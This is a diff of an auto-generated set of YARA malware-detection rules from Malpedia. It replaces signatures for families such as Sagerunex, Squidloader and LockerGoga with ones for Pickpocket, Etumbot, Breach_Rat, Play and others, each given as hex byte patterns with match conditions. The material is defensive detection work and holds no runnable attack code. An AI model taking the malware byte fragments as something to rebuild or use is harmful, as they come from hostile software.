 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sagerunex_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pickpocket_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "dff18f54b10b1df23611f9090ec75c66093dde952c82cc96492b8dbdbdc0e627"
+		logic_hash = "b44df7bc5acbc6d7badbaaac3695700d24536089857d9464cd11f3048d47faf5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127391,34 +127704,34 @@ rule MALPEDIA_Win_Sagerunex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488d83dcd70000 41b932000000 4c8bc6 33d2 33c9 c744242832000000 }
-		$sequence_1 = { c1c802 33c8 8bc3 23c7 0bf0 8d040a 8b0c24 }
-		$sequence_2 = { 49c1ea08 443378f4 48c1e910 440fb6c1 418bcb 478ba48650510400 48c1e908 }
-		$sequence_3 = { 448d6304 66894670 4d8bef 498bcd e8???????? 4883f832 }
-		$sequence_4 = { 448bc6 ba12000000 e8???????? 33f6 eb52 488d542430 e8???????? }
-		$sequence_5 = { 8bc5 81c19979825a 4123c2 034c240c 03d9 }
-		$sequence_6 = { 498b4e10 e8???????? 49896e08 4d896610 33d2 498bce e8???????? }
-		$sequence_7 = { 0fb6480f 440fb60c19 0fb6480e 0fb61419 0fb6480d 41c1e108 4433ca }
-		$sequence_8 = { 4c8d4728 4c8d4f10 488bd6 488bce 4889442420 e8???????? 85c0 }
-		$sequence_9 = { 488d542470 4c8bc0 458bcf ff15???????? 85c0 0f84a3000000 0fb7c6 }
+		$sequence_0 = { eb0c b96ccb0000 eb05 b960cb0000 e8???????? }
+		$sequence_1 = { b97dcb0000 eb0c b96ccb0000 eb05 b960cb0000 e8???????? eb02 }
+		$sequence_2 = { 750f b962890100 e8???????? e9???????? }
+		$sequence_3 = { 750f b93eaf0000 e8???????? e9???????? }
+		$sequence_4 = { eb05 b960cb0000 e8???????? eb02 33c0 }
+		$sequence_5 = { 750e b958de0100 e8???????? 8bc8 }
+		$sequence_6 = { 750f b91f220100 e8???????? e9???????? }
+		$sequence_7 = { 741a b97dcb0000 eb0c b96ccb0000 eb05 }
+		$sequence_8 = { 33c0 eb0a b952ca0000 e8???????? }
+		$sequence_9 = { 3bc7 760a b988d30000 e9???????? }
 
 	condition:
-		7 of them and filesize < 619520
+		7 of them and filesize < 1458176
 }
-rule MALPEDIA_Win_Squidloader_Auto : FILE
+rule MALPEDIA_Win_Etumbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e1ae0a2d-727c-526d-ba6d-df7206fb7292"
+		id = "7578b31c-0ed7-55b3-8074-02b9b6496821"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squidloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.squidloader_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.etumbot_auto.yar#L1-L321"
 		license_url = "N/A"
-		logic_hash = "457a1f3d7d17509f684b88b8b92c880d3534d76469a8f93e7dd90a9494a02ca3"
+		logic_hash = "619819745936f9a40c560bb9c0dbcb5d200dd2306f9f732e72d34a6b9dc82070"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -127430,34 +127743,59 @@ rule MALPEDIA_Win_Squidloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d0ddcfdffff 448d4008 e8???????? 488bcb ff15???????? 4533e4 4983c708 }
-		$sequence_1 = { 4889742420 57 4881ec90000000 488b05???????? 4833c4 4889842480000000 488bda }
-		$sequence_2 = { 5f 5e c3 4053 4883ec30 488bd9 8b4934 }
-		$sequence_3 = { 48c1fa03 4c3be2 7417 492bd4 4a8d0ce7 4c8d0ddcfdffff 448d4008 }
-		$sequence_4 = { 4a8d04a500000000 4c8d0480 8b5e08 4585ff }
-		$sequence_5 = { 7402 8902 33db 48c7411807000000 488d156bd80200 }
-		$sequence_6 = { 7403 49ffcb 400fb6d6 488d1d2ce70000 }
-		$sequence_7 = { 4a8d04a500000000 4585e4 48c7c1ffffffff 480f49c8 e8???????? 4989c7 }
-		$sequence_8 = { 4a8d04a500000000 4c8d0440 4c8bbc24e8020000 488b8424f0020000 }
-		$sequence_9 = { 4a8d04a6 4883c008 f3420f7e4c8608 f3420f7e44a608 }
-		$sequence_10 = { 7402 890e 4863c1 488d15c8d50200 }
-		$sequence_11 = { 7403 48ffcd 488bfd 48c1e705 }
+		$sequence_0 = { 8811 8a00 02c2 0fb6c0 8a8405fcfeffff 320437 8806 }
+		$sequence_1 = { 8d45f4 6820a10700 50 68???????? }
+		$sequence_2 = { c745ac5c5c4d69 c745b063726f73 c745b46f66745c c745b85c57696e }
+		$sequence_3 = { 8d45a4 50 6801000080 c745a4536f6674 }
+		$sequence_4 = { ffd7 2bc3 3bc6 72ed }
+		$sequence_5 = { ffd7 8b7508 8bd8 69f660ea0000 }
+		$sequence_6 = { 33c7 f7d1 23c1 42 4e 75df }
+		$sequence_7 = { c745b46f66745c c745b85c57696e c745bc646f7773 c745c05c5c4375 c745c47272656e c745c874566572 c745cc73696f6e }
+		$sequence_8 = { 57 0fbe38 33f6 33db }
+		$sequence_9 = { c1e004 03c1 8bc8 81e1000000f0 7407 8bf9 }
+		$sequence_10 = { c745c874566572 c745cc73696f6e c745d05c5c496e c745d47465726e c745d865742053 }
+		$sequence_11 = { 81e1000000f0 7407 8bf9 c1ef18 33c7 f7d1 }
+		$sequence_12 = { c745d47465726e c745d865742053 c745dc65747469 c745e06e677300 }
+		$sequence_13 = { c645d720 c645d84e c645d954 c645da20 }
+		$sequence_14 = { a1???????? 57 83f801 7507 33c0 a3???????? }
+		$sequence_15 = { 034df0 8b5508 0355ec 8a02 }
+		$sequence_16 = { 6a00 68???????? 6a00 6a00 6a00 51 }
+		$sequence_17 = { e8???????? 85c0 75f5 53 }
+		$sequence_18 = { c645c653 c645c749 c645c845 c645c920 }
+		$sequence_19 = { 8811 8818 7cc3 8b450c }
+		$sequence_20 = { 8b4d08 034dec 8a11 8810 8b45f0 }
+		$sequence_21 = { 56 57 8b7d08 8065fe00 8d45e4 }
+		$sequence_22 = { c645f462 c645f56c 50 c645f665 }
+		$sequence_23 = { 8b45f4 0345f0 8b4d08 034dec }
+		$sequence_24 = { 83c204 3b5514 7608 83c8ff }
+		$sequence_25 = { 50 8d8504ffffff 50 c645e761 c645e874 c645e965 c645ea20 }
+		$sequence_26 = { c645c420 c645c54d c645c653 c645c749 }
+		$sequence_27 = { 8d4a01 83c404 8bd1 c1e902 }
+		$sequence_28 = { 80e10f c0e102 c0eb06 02cb }
+		$sequence_29 = { 881c2e c0e006 24c0 88442e01 8b442458 46 }
+		$sequence_30 = { 8d540964 52 e8???????? 83c404 }
+		$sequence_31 = { 53 8b5c240c 56 c60200 a1???????? }
+		$sequence_32 = { 83c104 3b4d14 7608 83c8ff }
+		$sequence_33 = { c645ce3b c645cf20 c645d057 c645d169 }
+		$sequence_34 = { 8b4d08 83c101 894d08 8b550c 83ea03 }
+		$sequence_35 = { 50 8bce e8???????? 8d85f4d2ffff 50 }
+		$sequence_36 = { c68511feffff34 c68512feffff33 c68513feffff72 c68514feffff74 c68515feffff7e }
 
 	condition:
-		7 of them and filesize < 18701312
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Pebbledash_Auto : FILE
+rule MALPEDIA_Win_Breach_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32b0f21d-5afa-53d6-93e7-29fbd519196d"
+		id = "a5b42a75-e77a-5ca6-b3c1-cb4ca403dd4b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pebbledash_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.breach_rat_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9344c4ac60887a4e00c22de66e7202e2f1a072e514ea3fdd68e29205e525a98f"
+		logic_hash = "6d11bf02b16d797b6e97c762d9594bbc3acc80831e5eb5fa56307a891b9803ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127471,40 +127809,34 @@ rule MALPEDIA_Win_Pebbledash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 b9???????? e8???????? 85c0 7507 }
-		$sequence_1 = { 5e c3 55 8b6c2408 56 33f6 8b4d00 }
-		$sequence_2 = { e8???????? 33d2 b90e000000 f7f1 }
-		$sequence_3 = { 6829080000 68???????? 68???????? e8???????? 83c40c }
-		$sequence_4 = { 832000 a1???????? a3???????? c3 8b442404 a3???????? c3 }
-		$sequence_5 = { 894604 5e c3 55 8bec 833d????????00 750f }
-		$sequence_6 = { 8bc1 5b 5e 5f c9 c3 6a01 }
-		$sequence_7 = { e8???????? 6888130000 ff15???????? b9???????? e8???????? 68???????? e8???????? }
-		$sequence_8 = { 8905???????? 0fb64201 440bc0 0fb64202 41c1e008 440bc0 }
-		$sequence_9 = { e8???????? 488d542440 488bce ffd0 }
-		$sequence_10 = { 0bc8 0fb6420b c1e108 0bc8 41894e08 }
-		$sequence_11 = { 66420f6e4ccb10 4b8d0c5b 660f6e5ccb10 4183c308 4c8d0440 66420f6e54c310 8d47ff }
-		$sequence_12 = { 3008 488d4001 4883ea01 75f0 eb0c }
-		$sequence_13 = { 0bc8 0fb6420f c1e108 0bc8 41894e0c }
-		$sequence_14 = { 498bcc 85c0 7512 e8???????? }
-		$sequence_15 = { 41c1e008 8905???????? 0fb64201 440bc0 }
+		$sequence_0 = { c7840548ffffffe4024400 8b8548ffffff 8b4804 8d41a0 89840d44ffffff 8d8d4cffffff e8???????? }
+		$sequence_1 = { 68???????? 8d855cfbffff c745fc65000000 50 8bce e8???????? }
+		$sequence_2 = { e8???????? c1e008 8bce 03f8 e8???????? c1e010 8bce }
+		$sequence_3 = { 8b0e 894654 e8???????? 8b06 83781000 7514 33c0 }
+		$sequence_4 = { 5d c3 837e1000 0f85f4feffff c74720ffffffff 33c0 }
+		$sequence_5 = { c6459800 e8???????? 68???????? 6a01 8d4598 c745fc00000000 50 }
+		$sequence_6 = { ff75ac e8???????? 83c404 8b7d80 8d856cffffff ffb57cffffff 8bb56cffffff }
+		$sequence_7 = { c7465800000000 e8???????? 894654 c645fc04 c7465c00000000 c7466000000000 e8???????? }
+		$sequence_8 = { 66d3ef 8b4de4 83c1f0 6689b8b0160000 0188b4160000 eb19 668b90b40a0000 }
+		$sequence_9 = { 7408 83c002 49 75f5 33c0 85c0 7453 }
 
 	condition:
-		7 of them and filesize < 677888
+		7 of them and filesize < 645120
 }
-rule MALPEDIA_Win_Skinnyboy_Auto : FILE
+rule MALPEDIA_Win_Sisfader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fad10de8-1dee-57f5-9740-77610ecb50ba"
+		id = "ac94263f-1708-5e52-9df6-f609af38fa64"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skinnyboy_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sisfader_auto.yar#L1-L276"
 		license_url = "N/A"
-		logic_hash = "c9afcf0da0b1a37ea370d6affaf9ae89cf13a4478cab0becac117427110aff91"
+		logic_hash = "5ae29b623b53b54fbc47f6ef4a5785e5e7b4cfe669d9c31d6f6094ced51ab6b7"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -127516,32 +127848,52 @@ rule MALPEDIA_Win_Skinnyboy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 888158050110 41 ebe8 8975e0 }
-		$sequence_1 = { 8d8560fdffff 50 8d8558fbffff 50 }
-		$sequence_2 = { 8975fc 8b45e0 8b048510110110 f644030401 }
-		$sequence_3 = { 837de416 7426 8d45e0 50 ff15???????? 8d45e0 50 }
-		$sequence_4 = { 8d8df0feffff e8???????? 83c408 8d5508 8d8de4feffff }
-		$sequence_5 = { c78578ffffff01591244 c7857cffffff09020f1c c745804a6a2362 c7458413051f17 c6458853 }
-		$sequence_6 = { 8bf7 83e61f c1e606 03348510110110 837e0800 7530 }
-		$sequence_7 = { ffd7 50 ffd6 6800dd6d00 ff35???????? }
-		$sequence_8 = { 8b9dd4feffff 8b85e4feffff 53 50 8d8dd8feffff e8???????? }
-		$sequence_9 = { 8d45f4 50 ff7308 ff15???????? 8b15???????? 85c0 }
+		$sequence_0 = { 85c9 741f 33c0 85c9 7419 }
+		$sequence_1 = { e8???????? 85c0 b91d000000 0f44d9 }
+		$sequence_2 = { 33d2 b901000000 e8???????? eb67 }
+		$sequence_3 = { 83c801 8945f0 8b4df0 894de4 }
+		$sequence_4 = { 53 56 57 6810010000 6a40 }
+		$sequence_5 = { 81eca8010000 8d855cfeffff 53 56 }
+		$sequence_6 = { 8b040a 50 ff15???????? a3???????? }
+		$sequence_7 = { 33c9 0f8543ffffff 8b55f8 52 ff15???????? 8be5 }
+		$sequence_8 = { 8906 8b442470 89442440 8b44246c }
+		$sequence_9 = { 837c242001 7402 eb05 e8???????? b801000000 }
+		$sequence_10 = { 8b442430 8905???????? c705????????07000000 8b442438 8905???????? c705????????00000000 8b442440 }
+		$sequence_11 = { 6a00 6a00 6a01 e8???????? 83c40c eb38 }
+		$sequence_12 = { c705????????00000000 6a01 6a00 6a02 e8???????? }
+		$sequence_13 = { 837c242003 745d 837c242004 7479 837c242005 }
+		$sequence_14 = { 0fb74816 81e100200000 7409 c745d801000000 }
+		$sequence_15 = { 7e08 03d8 3bdf 7c98 }
+		$sequence_16 = { 0f108f48010000 0f110d???????? 0f10872e010000 0f118600010000 ff15???????? }
+		$sequence_17 = { 83c418 b842000000 6bc800 8b5510 0fb7440a40 }
+		$sequence_18 = { 7411 6683f92e 7509 66399db0010000 7402 ffc7 }
+		$sequence_19 = { e8???????? 33c0 83f801 7425 }
+		$sequence_20 = { 5d c3 8b450c b986000000 56 57 6a00 }
+		$sequence_21 = { c3 b82b050000 5f 5e 5b }
+		$sequence_22 = { 89442420 837c242001 7425 837c242002 7441 837c242003 745d }
+		$sequence_23 = { 89442450 837c245000 7405 e9???????? 83bc248000000000 7539 }
+		$sequence_24 = { 0f108348010000 0f1105???????? 0f10832e010000 0f1187e0000000 ff15???????? 8bf0 8d9ff0000000 }
+		$sequence_25 = { eb12 c744245401000000 33c0 85c0 0f850fffffff }
+		$sequence_26 = { c744240cdcff0000 740c b818000000 5f }
+		$sequence_27 = { 8b45ec 50 8b4dd4 51 e8???????? }
+		$sequence_28 = { 7464 6683bdcc0100002e 751c 0fb785ce010000 }
+		$sequence_29 = { 894708 817908020f0000 0f8573010000 83790410 c7442470dcff0000 740d }
 
 	condition:
-		7 of them and filesize < 176128
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Lock_Pos_Auto : FILE
+rule MALPEDIA_Win_Zxxz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66d7719a-09f7-5449-96c8-7a2badb35721"
+		id = "7dd263db-5dc9-5446-993f-e84614693a03"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lock_pos_auto.yar#L1-L147"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zxxz_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "68264cf97fe11e22f20de5aa9fd8236aae89e24686e8c6b06c621f87466b5d04"
+		logic_hash = "7a7e7dba53ef8e0486a9f712bcc36135ae7e5d2a4697169aaecab71dcaa9f879"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127555,35 +127907,32 @@ rule MALPEDIA_Win_Lock_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 8b4508 8b0d???????? 8b0481 }
-		$sequence_1 = { 8bec 837d0800 7704 33c0 }
-		$sequence_2 = { 6a00 6a23 6a00 ff15???????? 8d8df8fdffff }
-		$sequence_3 = { 55 8bec 81eca4040000 56 }
-		$sequence_4 = { 8d85f8fdffff 50 6a00 6a00 6a23 }
-		$sequence_5 = { 6a00 32db e8???????? 8bf8 59 59 85ff }
-		$sequence_6 = { 8b450c 85c0 740a 8b55f8 8911 8b4dfc 8908 }
-		$sequence_7 = { ff15???????? 85c0 7555 57 6a04 8d45e4 50 }
-		$sequence_8 = { 8b4de4 034804 894de4 8b55f0 8b45f0 034204 8945f0 }
-		$sequence_9 = { 6a04 8b4508 50 8d4dec 51 e8???????? 83c40c }
-		$sequence_10 = { 8908 837df400 740b 8b55f4 }
-		$sequence_11 = { 837dfc00 7414 8b450c 50 8b4d08 51 }
-		$sequence_12 = { 8b45dc 83e801 8945dc 85d2 0f843a010000 8b4df4 668b11 }
+		$sequence_0 = { ffd6 83c40c 33c0 8bff 8a88b0005f00 }
+		$sequence_1 = { 68f8000000 50 8d8c240e010000 51 6689842410010000 e8???????? }
+		$sequence_2 = { 83c404 68???????? 681c020000 57 ffd6 }
+		$sequence_3 = { ffd5 83c40c 68???????? 68fa000000 }
+		$sequence_4 = { 52 ff15???????? 8b3d???????? 8bf0 56 6a01 6a01 }
+		$sequence_5 = { 33c4 89842404200000 53 56 8b35???????? }
+		$sequence_6 = { 668b0d???????? 66890f bf???????? e8???????? 84c0 7407 }
+		$sequence_7 = { c605????????01 ffd3 e8???????? 6830750000 ffd3 6a01 6a00 }
+		$sequence_8 = { 50 56 ff15???????? 8b2d???????? 57 6800100000 53 }
+		$sequence_9 = { 83c408 85c0 752f 8d442408 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 4142080
 }
-rule MALPEDIA_Win_Zhcat_Auto : FILE
+rule MALPEDIA_Win_Misfox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "632a3d5c-2d89-5179-ac16-c2aceba5bbfa"
+		id = "4f561487-7df3-5819-8af4-11354d9ab382"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zhcat_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.misfox_auto.yar#L1-L178"
 		license_url = "N/A"
-		logic_hash = "1660d8f51e51dd71d6a1d9261fb6addc44fa7696401b7d8f6127a7c99ca1c719"
+		logic_hash = "edbf452d1e5320fd7ba0f107fb137baa64797e4d5896d9322787053f0ee80ff3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127597,32 +127946,38 @@ rule MALPEDIA_Win_Zhcat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7537 68???????? e8???????? e9???????? 8b35???????? }
-		$sequence_1 = { 53 ffd6 8945f4 8d45f0 }
-		$sequence_2 = { c705????????02000000 eb1c c605????????01 eb13 c705????????01000000 eb07 c605????????01 }
-		$sequence_3 = { 59 e9???????? 8b36 8bce c1f905 8b0c8d40604100 }
-		$sequence_4 = { 83c418 53 ff750c 8bf0 8d0437 50 e8???????? }
-		$sequence_5 = { ffd7 6a02 8945d8 58 ff7514 668945c4 ffd6 }
-		$sequence_6 = { c1f905 8b0c8d40604100 c1e006 8d44010c 50 }
-		$sequence_7 = { 68ff000000 e8???????? 59 59 8b7508 8d34f590444100 391e }
-		$sequence_8 = { 0fb63e 0fb6c0 eb12 8b45e0 8a80044a4100 08443b1d 0fb64601 }
-		$sequence_9 = { 8bfb f3a5 66a5 7424 }
+		$sequence_0 = { 51 ba00020000 c744244800080000 8d4c2434 89442444 e8???????? 83c404 }
+		$sequence_1 = { 8d7f04 f77d08 8b45f8 46 0fb61402 03d1 0355fc }
+		$sequence_2 = { 884dab 83f80b 0f877b020000 ff2485b4d30010 8d41cf 3c08 }
+		$sequence_3 = { 6a02 6a00 6a00 6800000040 8d84243c010000 }
+		$sequence_4 = { 56 ff15???????? 8d4c2410 e8???????? 56 ff15???????? }
+		$sequence_5 = { 57 33c0 8d7b08 8bf7 8906 }
+		$sequence_6 = { 8b048550870110 f644010440 7409 803a1a 7504 }
+		$sequence_7 = { 6a25 40 50 8d45d0 50 ff15???????? 8d45c0 }
+		$sequence_8 = { e8???????? 488d053cf90000 488d15b56c0100 488d4c2420 4889442420 }
+		$sequence_9 = { 3b3d???????? 737d 488bc7 488bdf 48c1fb05 4c8d3512e30000 }
+		$sequence_10 = { 458d4e1b 4533c0 488bd6 48c7c101000080 }
+		$sequence_11 = { 8b7520 eb04 8b742460 488d85d0000000 4889442420 4533c9 }
+		$sequence_12 = { e8???????? bb22000000 e9???????? 48897c2410 4c89742420 55 488bec }
+		$sequence_13 = { b8fb81ace5 41f7e9 4103d1 c1fa0f 8bc2 c1e81f }
+		$sequence_14 = { 8b04b1 488d0cb1 418942fc 448901 4181f900010000 7cc3 4c891c24 }
+		$sequence_15 = { 1bc0 4123c4 ffc8 443875f8 740b 488b4df0 83a1c8000000fd }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 266240
 }
-rule MALPEDIA_Win_Moonwind_Auto : FILE
+rule MALPEDIA_Win_Play_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c3fad56f-d87f-5c82-8de0-ae938da1f3ea"
+		id = "4738940b-7da5-50c4-88b2-14247a6e9490"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moonwind_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.play"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.play_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "e8ac75896a4e3b1235e6b43c3207bc2e4011dd5892e4b54601195386441510bf"
+		logic_hash = "5818fd91a2bec1f70682fe35fe8b96ef11658990dd8b01971531f81d25cdc716"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127636,32 +127991,32 @@ rule MALPEDIA_Win_Moonwind_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c706???????? 8d4e18 c744241003000000 e8???????? 8d4e14 c644241002 }
-		$sequence_1 = { 83c404 c1e002 03d8 8b1b 895dc4 8b5de0 895dc0 }
-		$sequence_2 = { 8945f0 6802000080 6a00 6800000000 6801030080 6a00 6801000000 }
-		$sequence_3 = { ff75d0 e8???????? 83c408 83f800 0f841d000000 68???????? ff75d0 }
-		$sequence_4 = { 83d8ff 85c0 750b c70201000000 e9???????? be???????? 8bc7 }
-		$sequence_5 = { 6a08 51 8bcd 89542418 8944241c c644242000 e8???????? }
-		$sequence_6 = { 50 6803000000 bb70020000 e8???????? 83c428 a3???????? 6801030080 }
-		$sequence_7 = { ff75f0 e8???????? 83c408 83f800 0f8518000000 c705????????00000000 8d45ec }
-		$sequence_8 = { dc05???????? dd5dd4 dd45d4 e8???????? 8945f0 837df006 0f8469050000 }
-		$sequence_9 = { f3a5 8b45f0 40 c1e002 83c008 50 ff75f4 }
+		$sequence_0 = { 80c316 befcffffff 8ac3 02db 02c3 02c7 008528feffff }
+		$sequence_1 = { 6804010000 50 e8???????? 8b95acfdffff 8d8dc8fdffff }
+		$sequence_2 = { f30f7e05???????? 660fd685d8fcffff 0f1005???????? c68508fdffff00 c68566fdffff4f 0f11857cfcffff }
+		$sequence_3 = { 99 8bf8 8d45c8 83c7ff 50 83d2ff 83ec08 }
+		$sequence_4 = { 8b5df8 8bd3 e8???????? 0fb67dbe 8bd3 8b4de4 }
+		$sequence_5 = { 000f 843402 0000 83ec04 b021 b24c }
+		$sequence_6 = { e9???????? 0fb7cb 81f97e0e0000 7645 8a95cffeffff 81c182f1ffff }
+		$sequence_7 = { 8945e8 0fb705???????? 668945ec a1???????? }
+		$sequence_8 = { 0fb705???????? 660fd68584fdffff f30f7e05???????? 660fd68578fdffff 0f1005???????? 668985b4fdffff }
+		$sequence_9 = { 8b85a8fdffff 6603fb 6640 6689bd04feffff 8985a8fdffff 41 66898588fdffff }
 
 	condition:
-		7 of them and filesize < 1417216
+		7 of them and filesize < 389120
 }
-rule MALPEDIA_Win_Lockergoga_Auto : FILE
+rule MALPEDIA_Win_Unidentified_076_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "098a7a92-b383-59d8-91b6-0fe20ed4e757"
+		id = "0c83626b-47ce-55ce-a381-007bcb7e73d5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lockergoga_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_076_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "c582e783be4f8c1eccf17c3665e883eb649b80d6c64ac8df726791d94d7fb2de"
+		logic_hash = "92802d8a51aa29b7bc92df361f52f4a28a9ddff1846405226196ebfa4afe53d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127675,32 +128030,32 @@ rule MALPEDIA_Win_Lockergoga_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? e9???????? c16d0c1f 8bc1 99 8bc8 c745d40f000000 }
-		$sequence_1 = { 6a01 895dec e8???????? 8d4b08 c703???????? c6411900 c74120ffffffff }
-		$sequence_2 = { e8???????? 8be5 5d c20c00 ffb51cffffff 8bcf e8???????? }
-		$sequence_3 = { ff10 8b4e3c 83f910 722c 8b4628 41 81f900100000 }
-		$sequence_4 = { 8d45f4 64a300000000 8bf1 8b06 ff90a4000000 85c0 7423 }
-		$sequence_5 = { f7ea 035584 c1fa05 8bc2 c1e81f 03c2 7458 }
-		$sequence_6 = { eb0f 57 8d4dc8 e8???????? 8b45cc 8945f0 807d0700 }
-		$sequence_7 = { 8b4830 85c9 7409 8b11 83c028 50 ff521c }
-		$sequence_8 = { e8???????? 807e1000 7562 8b4e04 8bc7 8a10 3a11 }
-		$sequence_9 = { e8???????? 8d4dbc e8???????? 8d8d2cffffff e8???????? 8b4df4 64890d00000000 }
+		$sequence_0 = { 0f95c3 488b6c2438 488b742440 488b7c2448 8bc3 488b5c2430 4883c420 }
+		$sequence_1 = { 448bc3 49894628 488b87c8000000 8bd5 488b4810 49894e18 }
+		$sequence_2 = { ff97f8000000 488bd8 4885c0 7508 418bf4 e9???????? }
+		$sequence_3 = { 488b87c8000000 33d2 488bce 448d4230 ff9020070000 488b87c8000000 }
+		$sequence_4 = { e9???????? 8b473c 33c9 394764 8d5101 0f43ca 4533e4 }
+		$sequence_5 = { 488b8bb00a0000 4885c9 7413 4c8b83c8000000 ba02000000 41ff90f0040000 488b93c8000000 }
+		$sequence_6 = { 488bcf 03c0 41898638040000 e8???????? 498d962c010000 488bcf e8???????? }
+		$sequence_7 = { 85c0 7e29 803c313b 740c 48ffc1 ffc2 }
